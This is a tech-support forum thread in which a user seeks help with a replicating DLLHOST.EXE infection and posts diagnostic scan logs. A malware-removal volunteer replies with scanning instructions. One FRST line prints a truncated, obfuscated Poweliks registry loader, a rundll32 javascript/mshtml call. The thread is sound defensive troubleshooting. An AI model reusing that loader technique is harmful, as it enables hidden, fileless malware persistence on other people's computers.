Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Infected with replicating DLLHOST.EXE virus


  • This topic is locked This topic is locked
13 replies to this topic

#1 stevesls

stevesls

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Alabama
  • Local time:12:04 PM

Posted 08 October 2014 - 06:31 PM

I have discovered that a computer has apparently become infected with the "DLLHOST.EXE" replicating virus that consumes memory and continuously tries to reach external IP addresses. I have tried numerous removal applications including MalwareBytes, ESET Online Scanner, Norton Power Eraser, ComboFix, AdwCleaner, Junkware Removal Tool, Microsoft Removal Tool and CCleaner, and none have successfully removed the virus.

 

I need the help of an expert to remove this infection.

 

The following is the contents of the DDSLOG:

 

*************************************************************

 

DDS (Ver_2012-11-20.01) - NTFS_x86
Internet Explorer: 11.0.9600.17280
Run by abaskins at 17:50:47 on 2014-10-08
Microsoft Windows 7 Professional   6.1.7601.1.1252.1.1033.18.3496.1294 [GMT -5:00]
.
AV: ESET NOD32 Antivirus 7.0 *Enabled/Updated* {19259FAE-8396-A113-46DB-15B0E7DFA289}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
SP: ESET NOD32 Antivirus 7.0 *Enabled/Updated* {A2447E4A-A5AC-AE9D-7C6B-2EC29C58E834}
.
============== Running Processes ================
.
C:\Windows\system32\wininit.exe
C:\Windows\system32\lsm.exe
C:\Windows\System32\spoolsv.exe
C:\Program Files\Common Files\Adobe\ARM\1.0\armsvc.exe
C:\Program Files\Microsoft Office 15\ClientX86\OfficeClickToRun.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
C:\Program Files\Intel\iCLS Client\HeciServer.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
C:\Program Files\PasswordBox\pbbtnService.exe
C:\Windows\system32\SAsrv.exe
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE
C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe
C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
C:\Windows\system32\taskhost.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
C:\Windows\System32\igfxtray.exe
C:\Windows\System32\hkcmd.exe
C:\Windows\System32\igfxpers.exe
C:\dell\DBRM\Reminder\DbrmTrayicon.exe
C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
C:\Program Files\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
C:\Program Files\Conexant\SAII\SmartAudio.exe
C:\Windows\Microsoft.Net\Framework\v3.0\WPF\PresentationFontCache.exe
C:\Windows\system32\SearchIndexer.exe
C:\Program Files\CCleaner\CCleaner.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
C:\Program Files\Dell Digital Delivery\DeliveryService.exe
C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
C:\Program Files\Intel\Intel® Management Engine Components\DAL\jhi_service.exe
C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
C:\Windows\system32\taskeng.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\taskmgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\wbengine.exe
C:\Windows\System32\vds.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\dllhost.exe
C:\Windows\system32\conhost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
C:\Windows\system32\svchost.exe -k RPCSS
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted
C:\Windows\system32\svchost.exe -k LocalService
C:\Windows\system32\svchost.exe -k netsvcs
C:\Windows\system32\svchost.exe -k GPSvcGroup
C:\Windows\system32\svchost.exe -k NetworkService
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation
C:\Windows\system32\svchost.exe -k imgsvc
C:\Windows\System32\svchost.exe -k secsvcs
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted
C:\Windows\system32\svchost.exe -k SDRSVC
C:\Windows\System32\svchost.exe -k swprv
.
============== Pseudo HJT Report ===============
.
uStart Page = hxxps://www.google.com/
mStart Page = hxxp://www.google.com
BHO: PasswordBox Helper: {5DB69B97-934B-451D-94DB-32EF802A01CD} - c:\program files\passwordbox\application\pbbtn.dll
BHO: Windows Live ID Sign-in Helper: {9030D464-4C02-4ABF-8ECC-5164760863C6} - c:\program files\common files\microsoft shared\windows live\WindowsLiveLogin.dll
BHO: Google Toolbar Helper: {AA58ED58-01DD-4d91-8333-CF10577473F7} - c:\program files\google\google toolbar\GoogleToolbar_32.dll
BHO: Office Document Cache Handler: {B4F3A835-0E21-4959-BA22-42B3008E02FF} - c:\program files\microsoft office 15\root\office15\URLREDIR.DLL
TB: Google Toolbar: {2318C2B1-4965-11d4-9B18-009027A5CD4F} - c:\program files\google\google toolbar\GoogleToolbar_32.dll
uRun: [CCleaner Monitoring] "c:\program files\ccleaner\CCleaner.exe" /MONITOR
mRun: [cAudioFilterAgent] c:\program files\conexant\caudiofilteragent\cAudioFilterAgent.exe
mRun: [SmartAudio] c:\program files\conexant\saii\SAIICpl.exe /t
mRun: [IgfxTray] c:\windows\system32\igfxtray.exe
mRun: [HotKeysCmds] c:\windows\system32\hkcmd.exe
mRun: [Persistence] c:\windows\system32\igfxpers.exe
mRun: [DBRMTray] c:\dell\dbrm\reminder\DbrmTrayIcon.exe
mRun: [egui] "c:\program files\eset\eset nod32 antivirus\egui.exe" /hide /waitservice
mRun: [IAStorIcon] "c:\program files\intel\intel® rapid storage technology\iastoriconlaunch.exe" "c:\program files\intel\intel® rapid storage technology\IAStorIcon.exe" 60
mRun: [Adobe ARM] "c:\program files\common files\adobe\arm\1.0\AdobeARM.exe"
mRunOnce: [DBRMTray] c:\dell\dbrm\reminder\TrayApp.exe
uPolicies-Explorer: NoDrives = dword:0
mPolicies-Explorer: NoDrives = dword:0
mPolicies-System: ConsentPromptBehaviorAdmin = dword:5
mPolicies-System: ConsentPromptBehaviorUser = dword:3
mPolicies-System: EnableUIADesktopToggle = dword:0
IE: E&xport to Microsoft Excel - c:\program files\microsoft office 15\root\office15\EXCEL.EXE/3000
IE: Se&nd to OneNote - c:\program files\microsoft office 15\root\office15\ONBttnIE.dll/105
IE: {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - {5F7B1267-94A9-47F5-98DB-E99415F33AEC} - c:\program files\windows live\writer\WriterBrowserExtension.dll
IE: {2670000A-7350-4f3c-8081-5663EE0C6C49} - {48E73304-E1D6-4330-914C-F5F514E3486C} - c:\program files\microsoft office 15\root\office15\ONBttnIE.dll
IE: {789FE86F-6FC4-46A1-9849-EDE0DB0C95CA} - {FFFDC614-B694-4AE6-AB38-5D6374584B52} - c:\program files\microsoft office 15\root\office15\ONBttnIELinkedNotes.dll
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} - hxxp://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
TCP: NameServer = 192.168.100.9 8.8.8.8
TCP: Interfaces\{2631625C-A08E-42B4-B974-5C022CA6D47A} : DHCPNameServer = 192.168.100.9 8.8.8.8
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - c:\program files\microsoft office 15\root\office15\MSOSB.DLL
Handler: wlpg - {E43EF6CD-A37A-4A9B-9E6F-83F89B8E6324} - c:\program files\windows live\photo gallery\AlbumDownloadProtocolHandler.dll
Notify: GoToAssist - c:\program files\citrix\gotoassist\917\G2AWinLogon.dll
Notify: igfxcui - igfxdev.dll
SSODL: WebCheck - <orphaned>
mASetup: {8A69D345-D564-463c-AFF1-A69D9E530F96} - "c:\program files\google\chrome\application\37.0.2062.124\installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --multi-install --chrome
.
============= SERVICES / DRIVERS ===============
.
R0 iaStorA;iaStorA;c:\windows\system32\drivers\iaStorA.sys [2013-7-15 531816]
R0 iaStorF;iaStorF;c:\windows\system32\drivers\iaStorF.sys [2013-7-15 25960]
R1 avgtp;avgtp;c:\windows\system32\drivers\avgtpx86.sys [2013-11-19 42784]
R1 eamonm;eamonm;c:\windows\system32\drivers\eamonm.sys [2013-9-17 188808]
R2 ClickToRunSvc;Microsoft Office ClickToRun Service;c:\program files\microsoft office 15\clientx86\officeclicktorun.exe [2014-4-22 1664176]
R2 DellDigitalDelivery;Dell Digital Delivery Service;c:\program files\dell digital delivery\DeliveryService.exe [2014-4-10 202248]
R2 ekrn;ESET Service;c:\program files\eset\eset nod32 antivirus\ekrn.exe [2013-9-12 1337752]
R2 epfwwfpr;epfwwfpr;c:\windows\system32\drivers\epfwwfpr.sys [2013-9-17 122376]
R2 IAStorDataMgrSvc;Intel® Rapid Storage Technology;c:\program files\intel\intel® rapid storage technology\IAStorDataMgrSvc.exe [2013-7-15 14696]
R2 Intel® Capability Licensing Service Interface;Intel® Capability Licensing Service Interface;c:\program files\intel\icls client\HeciServer.exe [2013-5-11 586240]
R2 jhi_service;Intel® Dynamic Application Loader Host Interface Service;c:\program files\intel\intel® management engine components\dal\Jhi_service.exe [2013-3-11 169432]
R2 MBAMScheduler;MBAMScheduler;c:\program files\malwarebytes anti-malware\mbamscheduler.exe [2014-10-7 1809720]
R2 MBAMService;MBAMService;c:\program files\malwarebytes anti-malware\mbamservice.exe [2014-10-7 860472]
R2 PasswordBox;PasswordBox;c:\program files\passwordbox\pbbtnService.exe [2014-5-14 67584]
R2 SAService;Conexant SmartAudio service;c:\windows\system32\SASrv.exe [2013-3-11 446592]
R3 ICCS;Intel® Integrated Clock Controller Service - Intel® ICCS;c:\program files\intel\intel® integrated clock controller service\ICCProxy.exe [2013-10-29 169752]
R3 IntcDAud;Intel® Display Audio;c:\windows\system32\drivers\IntcDAud.sys [2013-10-29 289792]
R3 MBAMProtector;MBAMProtector;c:\windows\system32\drivers\mbam.sys [2014-10-7 23256]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-10-7 110296]
R3 MBAMWebAccessControl;MBAMWebAccessControl;c:\windows\system32\drivers\mwac.sys [2014-10-7 51928]
R3 MEI;Intel® Management Engine Interface ;c:\windows\system32\drivers\TeeDriver.sys [2014-4-15 85464]
R3 RTL8167;Realtek 8167 NT Driver;c:\windows\system32\drivers\Rt86win7.sys [2013-3-11 394856]
S2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\microsoft.net\framework\v4.0.30319\mscorsvw.exe [2013-9-11 105144]
S2 vToolbarUpdater18.1.9;vToolbarUpdater18.1.9;c:\program files\common files\avg secure search\vtoolbarupdater\18.1.9\toolbarupdater.exe --> c:\program files\common files\avg secure search\vtoolbarupdater\18.1.9\ToolbarUpdater.exe [?]
S3 b57nd60x;Broadcom NetXtreme Gigabit Ethernet - NDIS 6.0;c:\windows\system32\drivers\b57nd60x.sys [2009-7-13 229888]
S3 dmvsc;dmvsc;c:\windows\system32\drivers\dmvsc.sys [2010-11-20 62464]
S3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\ieetwcollector.exe [2014-9-12 108032]
S3 Intel® Capability Licensing Service TCP IP Interface;Intel® Capability Licensing Service TCP IP Interface;c:\program files\intel\icls client\SocketHeciServer.exe [2013-5-11 637912]
S3 netvsc;netvsc;c:\windows\system32\drivers\netvsc60.sys [2010-11-20 126464]
S3 RdpVideoMiniport;Remote Desktop Video Miniport Driver;c:\windows\system32\drivers\rdpvideominiport.sys [2013-10-29 14848]
S3 StorSvc;Storage Service;c:\windows\system32\svchost.exe -k LocalSystemNetworkRestricted [2009-7-13 20992]
S3 SynthVid;SynthVid;c:\windows\system32\drivers\VMBusVideoM.sys [2010-11-20 19456]
S3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\TsUsbFlt.sys [2013-10-29 49664]
S3 TsUsbGD;Remote Desktop Generic USB Device;c:\windows\system32\drivers\TsUsbGD.sys [2013-10-29 27136]
S3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\wat\WatAdminSvc.exe [2013-10-29 1343400]
S4 wlcrasvc;Windows Live Mesh remote connections service;c:\program files\windows live\mesh\wlcrasvc.exe [2010-9-22 51040]
.
=============== Created Last 30 ================
.
2014-10-08 22:44:04 -------- d-----w- c:\users\abaskins\appdata\local\CrashDumps
2014-10-08 21:43:38 -------- d-----w- C:\NPE
2014-10-08 21:41:58 -------- d-----w- c:\users\abaskins\appdata\local\NPE
2014-10-08 20:46:07 -------- d-----w- c:\windows\ERUNT
2014-10-08 20:08:43 -------- d-----w- C:\DLLHOST
2014-10-08 20:07:23 -------- d-sh--w- C:\$RECYCLE.BIN
2014-10-08 19:44:50 98816 ----a-w- c:\windows\sed.exe
2014-10-08 19:44:50 256000 ----a-w- c:\windows\PEV.exe
2014-10-08 19:44:50 208896 ----a-w- c:\windows\MBR.exe
2014-10-08 16:06:05 -------- d-----w- C:\cc7da2abb943a08459f7361f5e
2014-10-08 12:58:20 -------- d-----w- c:\program files\CCleaner
2014-10-08 12:56:51 8806800 ----a-w- c:\programdata\microsoft\windows defender\definition updates\{94c65124-9164-4170-a2fc-63c1cd769a1f}\mpengine.dll
2014-10-07 22:50:31 536576 ----a-w- c:\windows\system32\sqlite3.dll
2014-10-07 22:49:29 -------- d-----w- C:\AdwCleaner
2014-10-07 19:41:10 110296 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-07 19:40:17 74456 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-07 19:40:16 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-07 19:40:15 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-10-07 19:40:12 -------- d-----w- c:\programdata\Malwarebytes
2014-10-07 19:40:12 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-10-07 18:59:58 -------- d-----w- c:\users\abaskins\appdata\local\ESET
2014-10-07 18:08:14 -------- d-----w- c:\windows\system32\webclient
2014-10-01 12:57:47 519680 ----a-w- c:\windows\system32\qdvd.dll
2014-09-24 12:57:48 2048 ----a-w- c:\windows\system32\tzres.dll
2014-09-12 00:41:13 550912 ----a-w- c:\windows\system32\kerberos.dll
2014-09-12 00:41:13 1059840 ----a-w- c:\windows\system32\lsasrv.dll
2014-09-12 00:40:51 1987584 ----a-w- c:\windows\system32\d3d10warp.dll
2014-09-12 00:40:49 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
2014-09-12 00:40:40 445952 ----a-w- c:\windows\system32\aepdu.dll
2014-09-12 00:40:40 302592 ----a-w- c:\windows\system32\aeinv.dll
.
==================== Find3M  ====================
.
2014-09-24 13:55:04 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-24 13:55:04 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-15 14:06:04 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-08-23 01:46:55 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-23 00:42:53 2352640 ----a-w- c:\windows\system32\win32k.sys
2014-08-18 22:08:55 4232704 ----a-w- c:\windows\system32\jscript9.dll
2014-08-18 21:57:44 2724864 ----a-w- c:\windows\system32\mshtml.tlb
2014-08-18 21:57:30 4096 ----a-w- c:\windows\system32\ieetwcollectorres.dll
2014-08-18 21:46:26 454656 ----a-w- c:\windows\system32\vbscript.dll
2014-08-18 21:45:23 61952 ----a-w- c:\windows\system32\iesetup.dll
2014-08-18 21:44:44 51200 ----a-w- c:\windows\system32\ieetwproxystub.dll
2014-08-18 21:44:09 61952 ----a-w- c:\windows\system32\MshtmlDac.dll
2014-08-18 21:36:07 112128 ----a-w- c:\windows\system32\ieUnatt.exe
2014-08-18 21:36:05 108032 ----a-w- c:\windows\system32\ieetwcollector.exe
2014-08-18 21:35:24 597504 ----a-w- c:\windows\system32\jscript9diag.dll
2014-08-18 21:30:29 646144 ----a-w- c:\windows\system32\MsSpellCheckingFacility.exe
2014-08-18 21:22:48 60416 ----a-w- c:\windows\system32\JavaScriptCollectionAgent.dll
2014-08-18 21:08:54 2014208 ----a-w- c:\windows\system32\inetcpl.cpl
2014-08-18 21:07:44 1068032 ----a-w- c:\windows\system32\mshtmlmedia.dll
2014-08-18 20:46:48 1812992 ----a-w- c:\windows\system32\wininet.dll
2014-08-12 15:35:42 42784 ----a-w- c:\windows\system32\drivers\avgtpx86.sys
2014-07-25 07:35:46 875688 ----a-w- c:\windows\system32\msvcr120_clr0400.dll
2014-07-14 01:42:02 654336 ----a-w- c:\windows\system32\rpcrt4.dll
.
============= FINISH: 17:51:26.19 ===============

 

Thank you for your help!!!!

 

Attached Files



BC AdBot (Login to Remove)

 


m

#2 B-boy/StyLe/

B-boy/StyLe/

    Bleepin' Freestyler


  • Malware Response Team
  • 8,285 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bulgaria
  • Local time:07:04 PM

Posted 09 October 2014 - 05:06 AM

Hello! Welcome to BleepingComputer Forums! :welcome:
My name is Georgi and and I will be helping you with your computer problems.

Before we begin, please note the following:

  • I will working be on your Malware issues, this may or may not, solve other issues you have with your machine.
  • The logs can take some time to research, so please be patient with me.
  • Stay with the topic until I tell you that your system is clean. Missing symptoms does not mean that everything is okay.
  • Instructions that I give are for your system only!
  • Please do not run any tools until requested ! The reason for this is so I know what is going on with the machine at any time. Some programs can interfere with others and hamper the recovery process.
  • Please perform all steps in the order received. If you can't understand something don't hesitate to ask.
  • Again I would like to remind you to make no further changes to your computer unless I direct you to do so. I will not help you if you do not follow my instructions.

 

 

Please download the latest version of Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatibale with your system. If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.

  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.
  • I will reply back later today since I am at work right now.

 

 

Regards,

Georgi


cXfZ4wS.png


#3 stevesls

stevesls
  • Topic Starter

  • Members
  • 11 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Alabama
  • Local time:12:04 PM

Posted 09 October 2014 - 08:14 AM

Hi Georgi!

 

Thank you so much for your rapid response and offer to help me with this DLLHOST.EXE infestation!  I look forward to following your guidance in this matter as I have tried everything I think of (essentially running numerous malware removal apps), with little to no success. Many apps don't even detect a problem.

 

As you have requested, I will stop all removal attempts on my own so that no further changes are made to the system, however, I plan on allowing the ESET ANTIVIRUS / FIREWALL and MalwareBytes to load on boot to provide some protection against other problems.  Malwarebytes appears to be blocking the DLLHOST.EXE from making external (outgoing) connections.... I imagine that is a "good thing". Let me know if you need me to disable any elements of either application.

 

As your instructed, I had downloaded and run the FarBar Recovery Tool and have imbedded / copied the two logs generated by the Tool below: 

 

**************************   FRST LOG   ****************************************

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version: 06-10-2014 01
Ran by abaskins (administrator) on ABASKINS on 09-10-2014 07:58:48
Running from C:\Users\abaskins\Desktop
Loaded Profile: abaskins (Available profiles: abaskins)
Platform: Microsoft Windows 7 Professional  Service Pack 1 (X86) OS Language: English (United States)
Internet Explorer Version 11
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX86\officeclicktorun.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbamservice.exe
(PasswordBox, Inc.) C:\Program Files\PasswordBox\pbbtnService.exe
(Conexant Systems, Inc.) C:\Windows\System32\SASrv.exe
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVC.EXE
(Microsoft Corp.) C:\Program Files\Common Files\microsoft shared\Windows Live\WLIDSVCM.EXE
(Malwarebytes Corporation) C:\Program Files\Malwarebytes Anti-Malware\mbam.exe
(Conexant Systems, Inc.) C:\Program Files\CONEXANT\cAudioFilterAgent\cAudioFilterAgent.exe
(Intel Corporation) C:\Windows\System32\igfxtray.exe
(Intel Corporation) C:\Windows\System32\hkcmd.exe
(Intel Corporation) C:\Windows\System32\igfxpers.exe
(Dell Computer Corporation) C:\dell\DBRM\Reminder\DbrmTrayicon.exe
(Conexant Systems, Inc) C:\Program Files\CONEXANT\SAII\SmartAudio.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Integrated Clock Controller Service\ICCProxy.exe
(Piriform Ltd) C:\Program Files\CCleaner\CCleaner.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework\v3.0\WPF\PresentationFontCache.exe
(Microsoft Corporation) C:\Windows\System32\wbem\unsecapp.exe
(Microsoft Corporation) C:\Windows\System32\taskmgr.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\root\office15\MSOSYNC.EXE
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Dell Products, LP.) C:\Program Files\Dell Digital Delivery\DeliveryService.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Intel Corporation) C:\Program Files\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Google Inc.) C:\Program Files\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [cAudioFilterAgent] => C:\Program Files\Conexant\cAudioFilterAgent\cAudioFilterAgent.exe [520320 2011-12-15] (Conexant Systems, Inc.)
HKLM\...\Run: [SmartAudio] => C:\Program Files\CONEXANT\SAII\SAIICpl.exe [310912 2011-06-24] (Conexant Systems, Inc.)
HKLM\...\Run: [DBRMTray] => C:\Dell\DBRM\Reminder\DbrmTrayIcon.exe [227328 2011-03-08] (Dell Computer Corporation)
HKLM\...\Run: [egui] => C:\Program Files\ESET\ESET NOD32 Antivirus\egui.exe [5110672 2013-09-12] (ESET)
HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel® Rapid Storage Technology\IAStorIcon.exe [286056 2013-07-15] (Intel Corporation)
HKLM\...\Run: [Adobe ARM] => C:\Program Files\Common Files\Adobe\ARM\1.0\AdobeARM.exe [959176 2014-08-21] (Adobe Systems Incorporated)
HKLM\...\RunOnce: [DBRMTray] => C:\Dell\DBRM\Reminder\TrayApp.exe [7168 2010-02-04] (Microsoft)
Winlogon\Notify\GoToAssist: C:\Program Files\Citrix\GoToAssist\917\G2AWinLogon.dll (Citrix Online, a division of Citrix Systems, Inc.)
HKU\S-1-5-21-151212660-612849681-608699423-1000\...\Run: [CCleaner Monitoring] => C:\Program Files\CCleaner\CCleaner.exe [4811032 2014-09-26] (Piriform Ltd)
HKU\S-1-5-21-151212660-612849681-608699423-1000\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKCU\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = https://www.google.com/
SearchScopes: HKLM - {A4BF3285-949C-4236-A02A-410021B1025E} URL = http://www.bing.com/search?q={searchTerms}&form=IE9TR&src=IE9TR&pc=MDDRJS
SearchScopes: HKCU - {3D75D89E-AE04-40F7-BFD3-95E6DFB28305} URL = https://www.google.com/search?q={searchTerms}
SearchScopes: HKCU - {A4BF3285-949C-4236-A02A-410021B1025E} URL =
BHO: PasswordBox Helper -> {5DB69B97-934B-451D-94DB-32EF802A01CD} -> C:\Program Files\PasswordBox\Application\pbbtn.dll (PasswordBox, Inc.)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Google Toolbar Helper -> {AA58ED58-01DD-4d91-8333-CF10577473F7} -> C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL (Microsoft Corporation)
Toolbar: HKLM - Google Toolbar - {2318C2B1-4965-11d4-9B18-009027A5CD4F} - C:\Program Files\Google\Google Toolbar\GoogleToolbar_32.dll (Google Inc.)
DPF: {166B1BCA-3F9C-11CF-8075-444553540000} http://download.macromedia.com/pub/shockwave/cabs/director/sw.cab
Handler: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL (Microsoft Corporation)
Tcpip\Parameters: [DhcpNameServer] 192.168.100.9 8.8.8.8

FireFox:
========
FF Plugin: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw_1213153.dll (Adobe Systems, Inc.)
FF Plugin: @EDVR/WebClient -> C:\windows\system32\WebClient\npwebclient.dll (Google)
FF Plugin: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll (Intel Corporation)
FF Plugin: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll (Intel Corporation)
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\4.0.50401.0\npctrl.dll ( Microsoft Corporation)
FF Plugin: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3502.0922 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @microsoft.com/WLPG,version=15.4.3508.1109 -> C:\Program Files\Windows Live\Photo Gallery\NPWLPG.dll (Microsoft Corporation)
FF Plugin: @tools.google.com/Google Update;version=3 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: @tools.google.com/Google Update;version=9 -> C:\Program Files\Google\Update\1.3.24.15\npGoogleUpdate3.dll (Google Inc.)
FF Plugin: Adobe Reader -> C:\Program Files\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll (Adobe Systems Inc.)
FF Plugin HKCU: CouponNetwork.com/CMDUniversalCouponPrintActivator -> C:\Users\abaskins\AppData\Roaming\CATALI~1\NPBCSK~1.DLL (Catalina Marketing Corporation)
